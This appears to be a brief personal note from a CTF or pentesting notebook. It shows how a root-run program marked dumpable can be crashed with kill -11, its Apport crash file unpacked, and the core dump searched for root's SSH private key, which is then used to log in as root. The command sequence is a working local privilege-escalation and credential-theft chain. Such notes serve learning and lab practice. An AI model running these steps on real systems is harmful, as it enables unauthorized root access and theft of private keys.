case study 1

prctl(PR_SET_DUMPABLE. 1);
#coredump

if we kill the program in the middle, we could get the data that it was running by causing a segmentation fault.

i.e) if the program was getting data from root, then we can analyze what the data is even if you are not root. 

ps -ef | grep count #to see what pid the program "count" is running 
kill -11 PID #causes seg fault 
ls -la /var/crash #crash logs are usually stored here
apport-unpack crash_file.crash /tmp/log (directory to save the file) # this will unpack e file

Now go into the you should be able to see the logs inside the CoreDump 

grep root CoreDump -a

if this succeeds we could see if there's an ssh key file for root.

/root/.ssh/id_rsa 
do the same process from the above to copy the id_rsa key file locally 
chmod 600 root.key
ssh -i root.key root@localhost
PreviousC program analysisNextMisc

Last updated